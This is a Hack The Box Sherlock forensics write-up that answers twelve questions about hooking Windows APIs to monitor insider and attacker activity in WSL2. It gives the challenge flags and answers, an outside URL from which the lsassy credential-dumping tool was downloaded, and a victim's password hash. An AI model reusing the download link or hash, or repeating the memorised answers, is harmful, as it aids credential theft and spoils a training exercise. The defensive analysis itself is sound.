Jugglin

HTB Sherlock Writeup

Posted on September 26, 2024

Sherlock Category: DFIR

Sherlock Difficulty: Medium

Scenario: Forela Corporation heavily depends on the utilisation of the Windows Subsystem for Linux (WSL), and currently, threat actors are leveraging this feature, taking advantage of its elusive nature that makes it difficult for defenders to detect. In response, the red team at Forela has executed a range of commands using WSL2 and shared API logs for analysis.

Task 1

Question: What was the initial command executed by the insider?

We are given two different .apmx64 files, Attacker.apmx and Insider.apmx. We can promptly open these files using API Monitor.

image

whoami

Task 2

Question: Which string function can be intercepted to monitor keystrokes by an insider?

Hack The Box has a blog on WSL activity and API Hooking where we can find the answer: How to track WSL2 activity with API hooking

image

RtlUnicodeToUTF8N, WideCharToMultiByte

Task 3

Question: Which Linux distribution the insider was interacting with?

image

kali

Task 4

Question: Which file did the insider access in order to read its contents?

Higher-level functions in KernalBase.dll may invoke RtlUnicodeToUTF8N as part of their operations for handling Unicode-to-UTF8 conversions. By filtering specifically for events involving KernalBase.dll, we can gain a clearer view of file access patterns.

image

flag.txt

Task 5

Question: Submit the first flag.

image

HOOK_tH1$_apI_R7lUNIcoDet0utf8N

Task 6

Question: Which PowerShell module did the insider utilize to extract data from their machine?

Looking again at the KernalBase.dll activity, we can see that the insider used the PowerShell module Invoke-WebRequest to extract data from their machine.

image

Invoke-WebRequest

Task 7

Question: Which string function can be intercepted to monitor the usage of Windows tools via WSL by an insider?

image

RtlUTF8ToUnicodeN

Task 8

Question: The insider has also accessed ‘confidential.txt’. Please provide the second flag for submission.

image

H0ok_ThIS_@PI_rtlutf8TounICOD3N

Task 9

Question: Which command executed by the attacker resulted in a ‘not found’ response?

image

lsassy

Task 10

Question: Which link was utilized to download the ‘lsassy’ binary?

image

http://3.6.165.8/lsassy

Task 11

Question: What is the SHA1 hash of victim ‘user’?

image

e8f97fba9104d1ea5047948e6dfb67facd9f5b73

Task 12

Question: When an attacker utilizes WSL2, which WIN32 API would you intercept to monitor its behavior?

WriteFile
Tags: HackTheBox, Windows, DFIR
Share: LinkedIn